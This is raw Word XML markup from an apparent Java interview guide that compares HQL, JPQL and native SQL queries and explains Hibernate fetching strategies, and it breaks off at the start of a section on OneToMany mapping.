          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hibernate framework</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645A0D4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It is database-agnostic because it works with Java objects and their relationships, not with database-specific SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBD870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1AF331DA"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e WHERE e.department = :department";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECC4525"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7D858B2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073975E6"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426CBAB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6043E73B"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object-oriented models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280A99BA"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atabase-independent as it uses Java objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B83F80"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JPQL (Java Persistence Query Language):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C68DD8D"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JPQL is a query language defined in the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specification. It is very similar to HQL but is defined as a standard in JPA, which makes it portable across different JPA providers like Hibernate, EclipseLink, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E085214"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JPQL is also object-oriented, similar to HQL, and uses entities rather than database tables and columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7041737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JPQL queries are executed within the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA framework</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F6E6BC"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Since JPQL is part of the JPA specification, it is more portable across different JPA implementations than HQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFE79C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509201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jpql = "SELECT e FROM Employee e WHERE e.department = :department";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6019D8"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ypedQuery&lt;Employee&gt; query = entityManager.createQuery(jpql, Employee.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCC30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D7D3262"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List&lt;Employee&gt; employees = query.getResultList();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4702CE57"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51B2B972"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andardized by JPA and portable across JPA providers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50811C16"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like HQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041F5163"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Native Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4081EA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A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refers to using th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syntax specific to the underlying database, which means it works directly with the database tables and columns rather than Java objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531A92C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Native queries are written using SQL (Structured Query Language), which is the database-specific language. This can include any SQL query that is valid for the database in use (e.g., MySQL, Oracle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7D5B8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Native queries are executed either through JPA or Hibernate, but they bypass the ORM layer and operate directly with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2DC46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xml:space="preserve">: Native queries are </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not portable</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because they are database-dependent. If the database changes, the native query may need to be rewritten to work with the new database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD391C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Hibernate with native SQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628B951E"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1FE49158"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1EA89099"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43BFF6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Object[]&gt; results = query.list();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366CF42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JPA with native SQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDFBE3C"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7E91C881"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entityManager.createNativeQuery(sql, Employee.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C5EC5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90943AF"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getResultList();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73768E9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264997DE"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lows the use of complex SQL queries, including vendor-specific features that are not supported by HQL or JPQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7053E51B"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for performance tuning or when a feature is not supported by the ORM framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D89254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530"/>
        <w:gridCol w:w="3042"/>
        <w:gridCol w:w="2995"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="3C6F4DF6" w14:textId="77777777" w:rsidTr="00A70A74">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="716736E8"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1FB24BA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QL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="160C4851"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PQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="703F035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Native Query</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="37849D28" w14:textId="77777777" w:rsidTr="00A70A74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="150EA2D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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D8B09F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c to Hibernate ORM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A0966F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art of JPA specification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25BF509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tive SQL query (vendor-specific)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="42316A16" w14:textId="77777777" w:rsidTr="00A70A74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="758DE69D"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nguage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FD502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09BF97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162FC8A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Structured Query Language)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="6BEB1B3B" w14:textId="77777777" w:rsidTr="00A70A74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CBFA96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5FD2C55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33E943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16DE5E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works directly with DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="22583297" w14:textId="77777777" w:rsidTr="00A70A74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35808E6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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FE516A9"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specific</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32A31F2C"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ortable across JPA providers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36EFA3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portable, database-dependent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="60CE7CB5" w14:textId="77777777" w:rsidTr="00A70A74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C9983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pping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18484C4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Hibernate entities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28A2F79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JPA entities (similar to HQL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F02283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database tables/columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="17B40480" w14:textId="77777777" w:rsidTr="00A70A74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C930FB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mplex SQL Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60CE786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6BEF0088"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4AF442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ull SQL capabilities, database-specific</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="67013AE3" w14:textId="77777777" w:rsidTr="00A70A74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="701D5B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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3144405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ROM Employee e WHERE e.dept = :dept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2263FE7A"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e FROM Employee e WHERE e.dept = :dept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="712657B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 FROM employee WHERE dept = :dept</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="353D0416"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When to Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D28FDF"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When using Hibernate as your ORM framework and you prefer to work with objects rather than tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E60341"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When using JPA and want to maintain portability between different JPA implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1792A8"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When you need to execute database-specific SQL queries or when you require performance optimizations or advanced SQL features not supported by HQL or JPQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468033F8" w14:textId="754DCDCE" w:rsidR="00E71FF1" w:rsidRPr="00CE4B95"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469" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="695C3F19" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="00CE4B95" w:rsidRDefault="006A176B" w:rsidP="006A176B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="577" w:name="_Toc197867791"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What kind of fetching strategy are you using in hibernate?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="577"/>
    </w:p>
    <w:p w14:paraId="09CF6BBF" w14:textId="64CB9355" w:rsidR="006A176B" w:rsidRPr="007F3379" w:rsidRDefault="006A176B"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fetching strategies define how related entities are retrieved from the database. There are two primary fetching strategies: </w:t>
      </w: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Below are the details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75652785"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Lazy Fetching (Default Behavior)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AA0ECE"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Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In lazy fetching, related entities are not loaded immediately with the parent entity. Instead, they are loaded only when accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B06C77B"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ful when you don't need to load all the related entities immediately, thus improving performance by avoiding unnecessary database queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1FA0EF"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If you have an entity Order that has a relationship with OrderDetails, you can specify lazy fetching so that OrderDetails are only loaded when explicitly accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6DD63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Lazy Fetching in Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BF598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One(fetch = FetchType.LAZY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D9E18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customer_id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AD402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Customer customer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B82B85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In this example, customer will not be loaded until it is accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E5ABFC"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Eager Fetching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06038AA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Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In eager fetching, related entities are loaded immediately with the parent entity, i.e., they are fetched as soon as the parent entity is retrieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EA498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d when you know that you will need the related entities immediately, and loading them upfront can reduce the number of database queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4712F1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For an Order entity with a relationship to OrderDetails, eager fetching would load the OrderDetails along with the Order entity in the same query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCF491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Eager Fetching in Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7733511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EAGER)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B9D9F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order_id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EC661A"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Detail&gt; orderDetails;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6215A6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Here, orderDetails will be fetched immediately along with the Order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AE9D88"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3. Fetching Strategies for Specific Relationships</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDE6E4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One</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This relationship is often eagerly fetched, especially if both entities are closely related and you need both at the same time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C398E0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One(fetch = FetchType.EAGER)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5709B20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profile_id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FE8A9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Profile profile;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2517552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By default, it is usually lazy-loaded, but if you need all the records at once, you can use eager fetching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2A05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LAZY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662EF90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gt; orders;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3315297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Many</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Like one-to-many, it’s typically lazy-loaded, but can be configured as eager if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE36CA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Many(fetch = FetchType.LAZY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CB2625"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Table(name = "student_course", joinColumns = @JoinColumn(name = "student_id"), inverseJoinColumns = @JoinColumn(name = "course_id"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1483222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Course&gt; courses;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C0E07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4. Join Fetching (JPQL or HQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536F3F7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In </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPQL (Java Persistence Query Language)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HQL (Hibernate Query Language)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you can specify fetching strategies in your query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE1BD9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Join Fetching</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08327CF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SELECT o FROM Order o JOIN FETCH o.orderDetails WHERE o.id = :id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F1753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This query will use </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>join fetching</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to load the orderDetails immediately with the Order entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312B66A6"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 of Fetching Strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690DBE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Related entities are loaded when accessed, improving performance by not fetching unnecessary data upfront.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F59D56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Related entities are loaded immediately, reducing the number of database queries but potentially affecting performance if too much data is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445CE4B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nsiderations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABE92C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Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lazy fetching avoids unnecessary loading but may result in multiple queries (N+1 problem), while eager fetching reduces the number of queries but may retrieve more data than needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C11976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N+1 Problem</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If lazy fetching is used improperly (e.g., accessing related entities inside loops), it may result in many unnecessary queries. This can be mitigated by using </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JOIN FETCH</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in queries or using </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eager loading</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EA7D0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Both strategies have their use cases, and it's important to choose based on the performance requirements of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6B7F2B" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="00CE4B95"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470" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9DEA98" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="00CE4B95" w:rsidRDefault="0099012D" w:rsidP="0099012D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="578" w:name="_Toc197867792"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is OneToMany mapping?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="578"/>
    </w:p>
    <w:p w14:paraId="10E07FE4" w14:textId="0EE99A8C" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D"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w:t>
      </w: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OneToMany Relationship</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE315F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Consider an example where we have two entities: </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Author</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Book</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. An author can write many books, but each book is written by one author. This is a typical one-to-many relationship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CE1D77"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tep-by-Step Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4D205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One" side (Author)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The Author class will have a one-to-many relationship with the Book class. In this case, an Author can have multiple books.</w:t>
      </w:r>
    </w:p>
